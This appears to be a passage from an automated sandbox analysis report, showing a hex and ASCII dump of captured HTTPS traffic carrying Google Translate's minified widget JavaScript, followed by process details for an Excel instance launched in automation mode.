                                        Data Ascii: a,b){return rf(this.h,a)?this.h[a]:b};_.h.set=function(a,b){rf(this.h,a)||(this.size+=1,this.g.push(a),this.j++);this.h[a]=b};_.h.forEach=function(a,b){for(var c=this.Lb(),d=0;d<c.length;d++){var e=c[d],f=this.get(e);a.call(b,f,e,this)}};_.h.keys=function
                                        2022-08-16 08:48:42 UTC54INData Raw: 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 76 61 6c 75 65 73 28 29 7d 3b 0a 76 61 72 20 75 66 3d 5b 5d 2c 76 66 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 64 29 7b 64 26 26 55 62 28 64 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 66 29 7b 65 5b 66 2e 69 64 5d 3d 21 30 3b 72 65 74 75 72 6e 20 65 7d 2c 63 2e 74 6b 29 7d 76 61 72 20 63 3d 7b 74 6b 3a 7b 7d 2c 69 6e 64 65 78 3a 75 66 2e 6c 65 6e 67 74 68 2c 65 6d 3a 61 7d 3b 62 28 61 2e 67 29 3b 62 28 61 2e 6a 29 3b 75 66 2e 70 75 73 68 28 63 29 3b 61 2e 67 26 26 5f 2e 52 62 28 61 2e 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 65 3d 64 2e 69 64 3b 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 26 26 64 2e 6d 6f 64 75 6c 65 26 26 28 65 2e 63 6b 3d 64 2e 6d 6f 64 75 6c 65 29 7d
                                        Data Ascii: on(){return this.values()};var uf=[],vf=function(a){function b(d){d&&Ub(d,function(e,f){e[f.id]=!0;return e},c.tk)}var c={tk:{},index:uf.length,em:a};b(a.g);b(a.j);uf.push(c);a.g&&_.Rb(a.g,function(d){var e=d.id;e instanceof A&&d.module&&(e.ck=d.module)}
                                        2022-08-16 08:48:42 UTC56INData Raw: 3d 21 30 7d 63 61 74 63 68 28 61 29 7b 42 66 3d 21 31 7d 5f 2e 43 66 3d 42 66 3b 0a 5f 2e 44 66 3d 52 65 67 45 78 70 28 22 5e 28 61 72 7c 63 6b 62 7c 64 76 7c 68 65 7c 69 77 7c 66 61 7c 6e 71 6f 7c 70 73 7c 73 64 7c 75 67 7c 75 72 7c 79 69 7c 2e 2a 5b 2d 5f 5d 28 41 64 6c 6d 7c 41 72 61 62 7c 48 65 62 72 7c 4e 6b 6f 6f 7c 52 6f 68 67 7c 54 68 61 61 29 29 28 3f 21 2e 2a 5b 2d 5f 5d 28 4c 61 74 6e 7c 43 79 72 6c 29 28 24 7c 2d 7c 5f 29 29 28 24 7c 2d 7c 5f 29 22 2c 22 69 22 29 3b 0a 5f 2e 45 66 3d 52 65 67 45 78 70 28 22 5e 28 3f 3a 28 5b 5e 3a 2f 3f 23 2e 5d 2b 29 3a 29 3f 28 3f 3a 2f 2f 28 3f 3a 28 5b 5e 5c 5c 5c 5c 2f 3f 23 5d 2a 29 40 29 3f 28 5b 5e 5c 5c 5c 5c 2f 3f 23 5d 2a 3f 29 28 3f 3a 3a 28 5b 30 2d 39 5d 2b 29 29 3f 28 3f 3d 5b 5c 5c 5c 5c 2f 3f
                                        Data Ascii: =!0}catch(a){Bf=!1}_.Cf=Bf;_.Df=RegExp("^(ar|ckb|dv|he|iw|fa|nqo|ps|sd|ug|ur|yi|.*[-_](Adlm|Arab|Hebr|Nkoo|Rohg|Thaa))(?!.*[-_](Latn|Cyrl)($|-|_))($|-|_)","i");_.Ef=RegExp("^(?:([^:/?#.]+):)?(?://(?:([^\\\\/?#]*)@)?([^\\\\/?#]*?)(?::([0-9]+))?(?=[\\\\/?
                                        2022-08-16 08:48:42 UTC57INData Raw: 68 69 73 2c 61 2c 62 29 3b 74 68 69 73 2e 6c 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 41 66 28 7a 66 2c 61 2c 62 29 29 7d 3b 73 61 28 77 66 2c 4c 66 29 3b 0a 76 66 28 7b 67 3a 5b 7b 69 64 3a 77 66 2c 68 66 3a 4c 66 2c 6d 75 6c 74 69 70 6c 65 3a 21 30 7d 5d 7d 29 3b 0a 76 61 72 20 4d 66 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 3d 61 3b 74 68 69 73 2e 74 79 70 65 3d 62 3b 74 68 69 73 2e 76 61 6c 75 65 3d 61 7d 3b 4d 66 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 76 61 6c 75 65 7d 3b 4d 66 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 76 61 6c 75 65 3d 61 7d 3b 0a 76 61
                                        Data Ascii: his,a,b);this.l.dispatchEvent(new Af(zf,a,b))};sa(wf,Lf);vf({g:[{id:wf,hf:Lf,multiple:!0}]});var Mf=function(a,b){this.defaultValue=a;this.type=b;this.value=a};Mf.prototype.get=function(){return this.value};Mf.prototype.set=function(a){this.value=a};va
                                        2022-08-16 08:48:42 UTC58INData Raw: 61 72 20 6b 3d 65 2e 6d 61 74 63 68 28 22 2f 22 2b 67 2b 22 3d 28 5b 5e 2f 5d 2b 29 22 29 3b 6b 26 26 52 66 28 64 2c 67 2c 6b 5b 31 5d 29 7d 29 3b 76 61 72 20 66 3d 2d 31 21 3d 61 2e 69 6e 64 65 78 4f 66 28 22 5f 2f 73 73 2f 22 29 3f 22 5f 2f 73 73 2f 22 3a 22 5f 2f 6a 73 2f 22 3b 64 2e 6a 3d 61 2e 73 75 62 73 74 72 28 30 2c 61 2e 69 6e 64 65 78 4f 66 28 66 29 2b 66 2e 6c 65 6e 67 74 68 29 3b 69 66 28 21 62 29 72 65 74 75 72 6e 20 64 3b 28 61 3d 63 2e 6d 61 74 63 68 28 5f 2e 45 66 29 5b 36 5d 7c 7c 6e 75 6c 6c 29 26 26 5f 2e 47 66 28 61 2c 66 75 6e 63 74 69 6f 6e 28 67 2c 6b 29 7b 64 2e 68 5b 67 5d 3d 6b 7d 29 3b 72 65 74 75 72 6e 20 64 7d 2c 54 66 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 73 74 61 72 74 73 57 69 74 68 28 22 68 74
                                        Data Ascii: ar k=e.match("/"+g+"=([^/]+)");k&&Rf(d,g,k[1])});var f=-1!=a.indexOf("_/ss/")?"_/ss/":"_/js/";d.j=a.substr(0,a.indexOf(f)+f.length);if(!b)return d;(a=c.match(_.Ef)[6]||null)&&_.Gf(a,function(g,k){d.h[g]=k});return d},Tf=function(a){return a.startsWith("ht
                                        2022-08-16 08:48:42 UTC60INData Raw: 3f 61 2e 71 64 28 62 2c 63 2c 64 2c 65 29 3a 61 3f 28 61 3d 5f 2e 4e 64 28 61 29 29 3f 61 2e 71 64 28 62 2c 63 2c 64 2c 65 29 3a 6e 75 6c 6c 3a 6e 75 6c 6c 2c 62 26 26 28 5f 2e 53 64 28 62 29 2c 64 65 6c 65 74 65 20 74 68 69 73 2e 67 5b 62 2e 6b 65 79 5d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 0a 5f 2e 5a 66 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 41 63 28 61 2e 67 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 74 68 69 73 2e 67 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 63 29 26 26 5f 2e 53 64 28 62 29 7d 2c 61 29 3b 61 2e 67 3d 7b 7d 7d 3b 5f 2e 49 2e 70 72 6f 74 6f 74 79 70 65 2e 4c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 5f 2e 49 2e 47 2e 4c 2e 63 61 6c 6c 28 74 68 69 73 29 3b 5f 2e 5a 66 28 74 68 69 73 29 7d 3b 5f 2e 49 2e 70 72 6f 74 6f 74
                                        Data Ascii: ?a.qd(b,c,d,e):a?(a=_.Nd(a))?a.qd(b,c,d,e):null:null,b&&(_.Sd(b),delete this.g[b.key]);return this};_.Zf=function(a){_.Ac(a.g,function(b,c){this.g.hasOwnProperty(c)&&_.Sd(b)},a);a.g={}};_.I.prototype.L=function(){_.I.G.L.call(this);_.Zf(this)};_.I.protot
                                        2022-08-16 08:48:42 UTC61INData Raw: 78 29 28 74 68 69 73 2e 69 69 2c 74 68 69 73 29 3b 74 68 69 73 2e 67 2e 6f 6e 65 72 72 6f 72 3d 28 30 2c 5f 2e 78 29 28 74 68 69 73 2e 41 67 2c 74 68 69 73 29 3b 74 68 69 73 2e 67 2e 6f 6e 70 72 6f 67 72 65 73 73 3d 28 30 2c 5f 2e 78 29 28 74 68 69 73 2e 78 6a 2c 74 68 69 73 29 3b 74 68 69 73 2e 67 2e 6f 6e 74 69 6d 65 6f 75 74 3d 28 30 2c 5f 2e 78 29 28 74 68 69 73 2e 43 6a 2c 74 68 69 73 29 7d 3b 5f 2e 68 3d 66 67 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 68 2e 6f 70 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 6e 75 6c 6c 21 3d 63 26 26 21 63 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 56 22 29 3b 74 68 69 73 2e 67 2e 6f 70 65 6e 28 61 2c 62 29 7d 3b 5f 2e 68 2e 73 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 29 69 66 28
                                        Data Ascii: x)(this.ii,this);this.g.onerror=(0,_.x)(this.Ag,this);this.g.onprogress=(0,_.x)(this.xj,this);this.g.ontimeout=(0,_.x)(this.Cj,this)};_.h=fg.prototype;_.h.open=function(a,b,c){if(null!=c&&!c)throw Error("V");this.g.open(a,b)};_.h.send=function(a){if(a)if(
                                        2022-08-16 08:48:42 UTC62INData Raw: 4a 3d 21 31 3b 74 68 69 73 2e 73 3d 30 3b 74 68 69 73 2e 42 3d 6e 75 6c 6c 3b 74 68 69 73 2e 58 3d 22 22 3b 74 68 69 73 2e 52 3d 74 68 69 73 2e 57 3d 21 31 7d 3b 5f 2e 79 28 5f 2e 6a 67 2c 5f 2e 47 29 3b 6b 67 3d 2f 5e 68 74 74 70 73 3f 24 2f 69 3b 6c 67 3d 5b 22 50 4f 53 54 22 2c 22 50 55 54 22 5d 3b 5f 2e 6d 67 3d 5b 5d 3b 5f 2e 6a 67 2e 70 72 6f 74 6f 74 79 70 65 2e 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 50 28 29 3b 5f 2e 78 61 28 5f 2e 6d 67 2c 74 68 69 73 29 7d 3b 0a 5f 2e 6a 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 69 66 28 74 68 69 73 2e 67 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 5a 60 22 2b 74 68 69 73 2e 6f 2b 22 60 22 2b 61 29 3b 62 3d 62 3f 62 2e 74 6f 55 70 70
                                        Data Ascii: J=!1;this.s=0;this.B=null;this.X="";this.R=this.W=!1};_.y(_.jg,_.G);kg=/^https?$/i;lg=["POST","PUT"];_.mg=[];_.jg.prototype.ba=function(){this.P();_.xa(_.mg,this)};_.jg.prototype.send=function(a,b,c,d){if(this.g)throw Error("Z`"+this.o+"`"+a);b=b?b.toUpp
                                        2022-08-16 08:48:42 UTC63INData Raw: 33 35 61 34 0d 0a 68 43 72 65 64 65 6e 74 69 61 6c 73 22 69 6e 0a 74 68 69 73 2e 67 26 26 74 68 69 73 2e 67 2e 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 21 3d 3d 74 68 69 73 2e 57 26 26 28 74 68 69 73 2e 67 2e 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 3d 74 68 69 73 2e 57 29 3b 74 72 79 7b 6f 67 28 74 68 69 73 29 2c 30 3c 74 68 69 73 2e 73 26 26 28 28 74 68 69 73 2e 52 3d 70 67 28 74 68 69 73 2e 67 29 29 3f 28 74 68 69 73 2e 67 2e 74 69 6d 65 6f 75 74 3d 74 68 69 73 2e 73 2c 74 68 69 73 2e 67 2e 6f 6e 74 69 6d 65 6f 75 74 3d 28 30 2c 5f 2e 78 29 28 74 68 69 73 2e 5a 2c 74 68 69 73 29 29 3a 74 68 69 73 2e 42 3d 5f 2e 68 67 28 74 68 69 73 2e 5a 2c 74 68 69 73 2e 73 2c 74 68 69 73 29 29 2c 74 68 69 73 2e 43 3d 21 30 2c 74 68 69 73 2e 67 2e 73 65 6e 64
                                        Data Ascii: 35a4hCredentials"inthis.g&&this.g.withCredentials!==this.W&&(this.g.withCredentials=this.W);try{og(this),0<this.s&&((this.R=pg(this.g))?(this.g.timeout=this.s,this.g.ontimeout=(0,_.x)(this.Z,this)):this.B=_.hg(this.Z,this.s,this)),this.C=!0,this.g.send
                                        2022-08-16 08:48:42 UTC65INData Raw: 61 2e 68 3d 21 31 3b 74 72 79 7b 61 2e 4d 63 28 29 3f 28 61 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 22 63 6f 6d 70 6c 65 74 65 22 29 2c 61 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 22 73 75 63 63 65 73 73 22 29 29 3a 28 61 2e 6c 3d 36 2c 71 67 28 61 29 29 7d 66 69 6e 61 6c 6c 79 7b 72 67 28 61 29 7d 7d 7d 2c 72 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 2e 67 29 7b 6f 67 28 61 29 3b 76 61 72 20 63 3d 61 2e 67 2c 64 3d 61 2e 49 5b 30 5d 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3a 6e 75 6c 6c 3b 61 2e 67 3d 6e 75 6c 6c 3b 61 2e 49 3d 6e 75 6c 6c 3b 62 7c 7c 61 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 22 72 65 61 64 79 22 29 3b 74 72 79 7b 63 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 64 7d 63 61 74 63 68 28 65 29
                                        Data Ascii: a.h=!1;try{a.Mc()?(a.dispatchEvent("complete"),a.dispatchEvent("success")):(a.l=6,qg(a))}finally{rg(a)}}},rg=function(a,b){if(a.g){og(a);var c=a.g,d=a.I[0]?function(){}:null;a.g=null;a.I=null;b||a.dispatchEvent("ready");try{c.onreadystatechange=d}catch(e)
                                        2022-08-16 08:48:42 UTC66INData Raw: 76 61 72 20 65 3d 64 2e 54 66 2c 66 3d 64 2e 69 6b 3b 61 3d 77 67 28 74 68 69 73 2c 61 2c 62 2c 64 2e 59 69 2c 63 29 3b 78 67 28 74 68 69 73 2c 61 2c 65 2c 66 2c 63 29 7d 3b 0a 76 61 72 20 77 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 64 3d 76 6f 69 64 20 30 3d 3d 3d 64 3f 7b 7d 3a 64 3b 76 61 72 20 66 3d 5b 5d 3b 79 67 28 61 2c 62 2c 63 2c 64 2c 76 6f 69 64 20 30 3d 3d 3d 65 3f 21 31 3a 65 2c 66 75 6e 63 74 69 6f 6e 28 67 29 7b 66 2e 70 75 73 68 28 67 2e 6f 62 28 29 29 7d 29 3b 72 65 74 75 72 6e 20 66 7d 2c 79 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 67 3d 76 6f 69 64 20 30 3d 3d 3d 67 3f 7b 7d 3a 67 3b 62 3d 5f 2e 56 61 28 62 29 3b 66 6f 72 28 76 61 72 20 6b 3d 62 2e 6e 65 78 74 28 29 3b 21 6b
                                        Data Ascii: var e=d.Tf,f=d.ik;a=wg(this,a,b,d.Yi,c);xg(this,a,e,f,c)};var wg=function(a,b,c,d,e){d=void 0===d?{}:d;var f=[];yg(a,b,c,d,void 0===e?!1:e,function(g){f.push(g.ob())});return f},yg=function(a,b,c,d,e,f,g){g=void 0===g?{}:g;b=_.Va(b);for(var k=b.next();!k
                                        2022-08-16 08:48:42 UTC67INData Raw: 65 6f 75 74 22 2c 28 30 2c 5f 2e 78 29 28 65 2e 42 2c 65 29 29 3b 58 66 28 61 2e 48 2c 66 2c 22 72 65 61 64 79 22 2c 66 2e 50 2c 21 31 2c 66 29 3b 66 2e 73 3d 33 45 34 3b 44 67 28 61 2e 52 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 2e 73 65 6e 64 28 64 29 3b 72 65 74 75 72 6e 20 65 2e 67 7d 29 3b 72 65 74 75 72 6e 20 65 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 2c 42 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 66 6f 72 28 76 61 72 20 65 3d 21 31 2c 66 2c 67 3d 21 31 2c 6b 3d 30 3b 6b 3c 62 2e 6c 65 6e 67 74 68 3b 6b 2b 2b 29 7b 76 61 72 20 6c 3d 62 5b 6b 5d 3b 69 66 28 21 66 26 26 6c 2e 6a 29 7b 65 3d 21 30 3b 66 3d 6c 2e 68 3b 62 72 65 61 6b 7d 65 6c 73 65 20 6c 2e 6c 26 26 28 67 3d 21 30 29 7d 76 61 72 20 6d 3d 5f 2e 79 61 28 61 2e 67 29 3b 28
                                        Data Ascii: eout",(0,_.x)(e.B,e));Xf(a.H,f,"ready",f.P,!1,f);f.s=3E4;Dg(a.R,function(){f.send(d);return e.g});return e}return null},Bg=function(a,b,c,d){for(var e=!1,f,g=!1,k=0;k<b.length;k++){var l=b[k];if(!f&&l.j){e=!0;f=l.h;break}else l.l&&(g=!0)}var m=_.ya(a.g);(
                                        2022-08-16 08:48:42 UTC68INData Raw: 7b 63 3d 77 69 6e 64 6f 77 3b 76 61 72 20 65 3d 5f 2e 46 62 28 61 2b 22 5c 72 5c 6e 2f 2f 23 20 73 6f 75 72 63 65 55 52 4c 3d 22 2b 62 29 2c 66 3d 5f 2e 45 62 28 65 29 3b 63 2e 65 76 61 6c 28 66 29 3d 3d 3d 66 26 26 63 2e 65 76 61 6c 28 66 2e 74 6f 53 74 72 69 6e 67 28 29 29 7d 63 61 74 63 68 28 67 29 7b 72 65 74 75 72 6e 21 31 7d 65 6c 73 65 20 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 46 67 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 5f 2e 46 66 28 61 2e 6d 61 74 63 68 28 5f 2e 45 66 29 5b 35 5d 7c 7c 6e 75 6c 6c 29 7c 7c 22 22 3b 62 3d 5f 2e 46 66 28 54 66 28 62 29 2e 6d 61 74 63 68 28 5f 2e 45 66 29 5b 35 5d 7c 7c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 62 26 26 62 2e 6d 61 74 63 68 28 22 28 2f 5f 2f 6a
                                        Data Ascii: {c=window;var e=_.Fb(a+"\r\n//# sourceURL="+b),f=_.Eb(e);c.eval(f)===f&&c.eval(f.toString())}catch(g){return!1}else return!1;return!0},Fg=function(a){var b=_.Ff(a.match(_.Ef)[5]||null)||"";b=_.Ff(Tf(b).match(_.Ef)[5]||null);return null!==b&&b.match("(/_/j
                                        2022-08-16 08:48:42 UTC70INData Raw: 29 3b 63 26 26 28 65 2e 6c 3d 63 29 3b 64 26 26 0a 28 65 2e 6a 3d 64 29 3b 65 2e 43 3d 62 3b 62 3d 6b 61 28 29 3b 62 2e 42 3d 65 3b 62 2e 55 68 28 21 30 29 3b 62 3d 6b 61 28 29 3b 62 2e 69 67 28 61 29 3b 61 2e 6a 28 62 29 7d 7d 29 3b 0a 0a 5f 2e 5f 4d 6f 64 75 6c 65 4d 61 6e 61 67 65 72 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 21 5f 2e 68 61 29 7b 69 66 28 21 5f 2e 69 61 29 72 65 74 75 72 6e 3b 5f 2e 6a 61 28 29 7d 5f 2e 68 61 2e 68 67 28 61 2c 62 29 7d 3b 0a 0a 5f 2e 5f 4d 6f 64 75 6c 65 4d 61 6e 61 67 65 72 5f 69 6e 69 74 69 61 6c 69 7a 65 28 27 62 2f 73 79 30 2f 65 6c 5f 63 6f 6e 66 3a 31 2f 73 79 32 2f 73 79 31 3a 33 2f 73 79 34 2f 73 79 33 3a 31 2c 34 2c 35 2f 65 6c 5f 6d 61 69 6e 3a 36 2f 65 6c 5f 73 65
                                        Data Ascii: );c&&(e.l=c);d&&(e.j=d);e.C=b;b=ka();b.B=e;b.Uh(!0);b=ka();b.ig(a);a.j(b)}});_._ModuleManager_initialize=function(a,b){if(!_.ha){if(!_.ia)return;_.ja()}_.ha.hg(a,b)};_._ModuleManager_initialize('b/sy0/el_conf:1/sy2/sy1:3/sy4/sy3:1,4,5/el_main:6/el_se
                                        2022-08-16 08:48:42 UTC71INData Raw: 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 61 5b 63 5d 29 3f 62 3d 62 5b 61 5b 63 5d 5d 3a 62 3d 62 5b 61 5b 63 5d 5d 3d 7b 7d 3a 62 3d 62 5b 61 5b 63 5d 5d 7c 7c 28 62 5b 61 5b 63 5d 5d 3d 7b 7d 29 3b 72 65 74 75 72 6e 20 62 7d 3b 4a 3d 7b 7d 3b 4d 53 47 5f 54 52 41 4e 53 4c 41 54 45 3d 22 54 72 61 6e 73 6c 61 74 65 22 3b 4a 5b 30 5d 3d 4d 53 47 5f 54 52 41 4e 53 4c 41 54 45 3b 4d 53 47 5f 43 41 4e 43 45 4c 3d 22 43 61 6e 63 65 6c 22 3b 4a 5b 31 5d 3d 4d 53 47 5f 43 41 4e 43 45 4c 3b 0a 4d 53 47 5f 43 4c 4f 53 45 3d 22 43 6c 6f 73 65 22 3b 4a 5b 32 5d 3d 4d 53 47 5f 43 4c 4f 53 45 3b 4d 53 47 46 55 4e 43 5f 50 41 47 45 5f 54 52 41 4e 53 4c 41 54 45 44 5f 54 4f 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 22 47 6f 6f 67 6c 65 20 68 61 73 20 74
                                        Data Ascii: asOwnProperty(a[c])?b=b[a[c]]:b=b[a[c]]={}:b=b[a[c]]||(b[a[c]]={});return b};J={};MSG_TRANSLATE="Translate";J[0]=MSG_TRANSLATE;MSG_CANCEL="Cancel";J[1]=MSG_CANCEL;MSG_CLOSE="Close";J[2]=MSG_CLOSE;MSGFUNC_PAGE_TRANSLATED_TO=function(a){return"Google has t
                                        2022-08-16 08:48:42 UTC72INData Raw: 65 20 73 65 6e 74 20 74 6f 20 47 6f 6f 67 6c 65 20 66 6f 72 20 74 72 61 6e 73 6c 61 74 69 6f 6e 2c 20 75 73 69 6e 67 20 61 20 73 65 63 75 72 65 20 63 6f 6e 6e 65 63 74 69 6f 6e 2e 22 3b 4a 5b 31 34 5d 3d 4d 53 47 5f 53 53 4c 5f 49 4e 46 4f 5f 53 45 43 55 52 45 5f 50 41 47 45 3b 4d 53 47 5f 53 53 4c 5f 49 4e 46 4f 5f 49 4e 54 52 41 4e 45 54 5f 50 41 47 45 3d 22 54 68 65 20 63 6f 6e 74 65 6e 74 20 6f 66 20 74 68 69 73 20 69 6e 74 72 61 6e 65 74 20 70 61 67 65 20 77 69 6c 6c 20 62 65 20 73 65 6e 74 20 74 6f 20 47 6f 6f 67 6c 65 20 66 6f 72 20 74 72 61 6e 73 6c 61 74 69 6f 6e 2c 20 75 73 69 6e 67 20 61 20 73 65 63 75 72 65 20 63 6f 6e 6e 65 63 74 69 6f 6e 2e 22 3b 4a 5b 31 35 5d 3d 4d 53 47 5f 53 53 4c 5f 49 4e 46 4f 5f 49 4e 54 52 41 4e 45 54 5f 50 41 47 45
                                        Data Ascii: e sent to Google for translation, using a secure connection.";J[14]=MSG_SSL_INFO_SECURE_PAGE;MSG_SSL_INFO_INTRANET_PAGE="The content of this intranet page will be sent to Google for translation, using a secure connection.";J[15]=MSG_SSL_INFO_INTRANET_PAGE
                                        2022-08-16 08:48:42 UTC73INData Raw: 3b 4d 53 47 5f 4f 50 54 49 4f 4e 53 3d 22 4f 70 74 69 6f 6e 73 22 3b 4a 5b 32 39 5d 3d 4d 53 47 5f 4f 50 54 49 4f 4e 53 3b 4d 53 47 5f 54 55 52 4e 5f 4f 46 46 5f 54 52 41 4e 53 4c 41 54 49 4f 4e 5f 46 4f 52 5f 54 48 49 53 5f 53 49 54 45 3d 22 54 75 72 6e 20 6f 66 66 20 74 72 61 6e 73 6c 61 74 69 6f 6e 20 66 6f 72 20 74 68 69 73 20 73 69 74 65 22 3b 4a 5b 33 30 5d 3d 4d 53 47 5f 54 55 52 4e 5f 4f 46 46 5f 54 52 41 4e 53 4c 41 54 49 4f 4e 5f 46 4f 52 5f 54 48 49 53 5f 53 49 54 45 3b 0a 4a 5b 33 31 5d 3d 6e 75 6c 6c 3b 4d 53 47 5f 41 4c 54 5f 53 55 47 47 45 53 54 49 4f 4e 3d 22 53 68 6f 77 20 61 6c 74 65 72 6e 61 74 69 76 65 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 22 3b 4a 5b 33 32 5d 3d 4d 53 47 5f 41 4c 54 5f 53 55 47 47 45 53 54 49 4f 4e 3b 4d 53 47 5f 41
                                        Data Ascii: ;MSG_OPTIONS="Options";J[29]=MSG_OPTIONS;MSG_TURN_OFF_TRANSLATION_FOR_THIS_SITE="Turn off translation for this site";J[30]=MSG_TURN_OFF_TRANSLATION_FOR_THIS_SITE;J[31]=null;MSG_ALT_SUGGESTION="Show alternative translations";J[32]=MSG_ALT_SUGGESTION;MSG_A
                                        2022-08-16 08:48:42 UTC75INData Raw: 65 20 6f 66 20 74 68 65 20 77 65 62 20 70 61 67 65 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 2e 22 3b 4a 5b 34 35 5d 3d 4d 53 47 5f 4c 41 4e 47 55 41 47 45 5f 55 4e 53 55 50 50 4f 52 54 45 44 3b 4d 53 47 5f 4c 41 4e 47 55 41 47 45 5f 54 52 41 4e 53 4c 41 54 45 5f 57 49 44 47 45 54 3d 22 4c 61 6e 67 75 61 67 65 20 54 72 61 6e 73 6c 61 74 65 20 57 69 64 67 65 74 22 3b 4a 5b 34 36 5d 3d 4d 53 47 5f 4c 41 4e 47 55 41 47 45 5f 54 52 41 4e 53 4c 41 54 45 5f 57 49 44 47 45 54 3b 0a 5f 2e 75 62 28 22 5f 65 78 70 6f 72 74 56 65 72 73 69 6f 6e 22 2c 5f 2e 5f 65 78 70 6f 72 74 56 65 72 73 69 6f 6e 29 3b 5f 2e 75 62 28 22 5f 67 65 74 43 61 6c 6c 62 61 63 6b 46 75 6e 63 74 69 6f 6e 22 2c 5f 2e 5f 67 65 74 43 61 6c 6c 62 61 63 6b 46 75 6e 63 74 69 6f 6e 29 3b
                                        Data Ascii: e of the web page is not supported.";J[45]=MSG_LANGUAGE_UNSUPPORTED;MSG_LANGUAGE_TRANSLATE_WIDGET="Language Translate Widget";J[46]=MSG_LANGUAGE_TRANSLATE_WIDGET;_.ub("_exportVersion",_._exportVersion);_.ub("_getCallbackFunction",_._getCallbackFunction);
                                        2022-08-16 08:48:42 UTC76INData Raw: 70 73 27 2b 27 3a 2f 2f 27 3b 20 63 2e 5f 70 61 68 3d 68 3b 20 63 2e 5f 70 61 73 3d 73 3b 20 63 6f 6e 73 74 20 62 3d 73 2b 27 74 72 61 6e 73 6c 61 74 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 3b 20 63 6f 6e 73 74 20 73 74 61 74 69 63 50 61 74 68 20 3d 20 27 2f 74 72 61 6e 73 6c 61 74 65 5f 73 74 61 74 69 63 2f 27 3b 20 63 2e 5f 70 63 69 3d 62 2b 73 74 61 74 69 63 50 61 74 68 2b 27 69 6d 67 2f 74 65 5f 63 74 72 6c 33 2e 67 69 66 27 3b 20 63 2e 5f 70 6d 69 3d 62 2b 73 74 61 74 69 63 50 61 74 68 2b 27 69 6d 67 2f 6d 69 6e 69 5f 67 6f 6f 67 6c 65 2e 70 6e 67 27 3b 20 63 2e 5f 70 62 69 3d 62 2b 73 74 61 74 69 63 50 61 74 68 2b 27 69 6d 67 2f 74 65 5f 62 6b 2e 67 69 66 27 3b 20 63 2e 5f 70 6c 69 3d 62 2b 73 74 61 74 69 63 50 61 74 68 2b 27 69 6d 67 2f
                                        Data Ascii: ps'+'://'; c._pah=h; c._pas=s; const b=s+'translate.googleapis.com'; const staticPath = '/translate_static/'; c._pci=b+staticPath+'img/te_ctrl3.gif'; c._pmi=b+staticPath+'img/mini_google.png'; c._pbi=b+staticPath+'img/te_bk.gif'; c._pli=b+staticPath+'img/
                                        2022-08-16 08:48:42 UTC77INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:10:48:15
                                        Start date:16/08/2022
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                        Imagebase:0x13f170000
                                        File size:28253536 bytes
                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
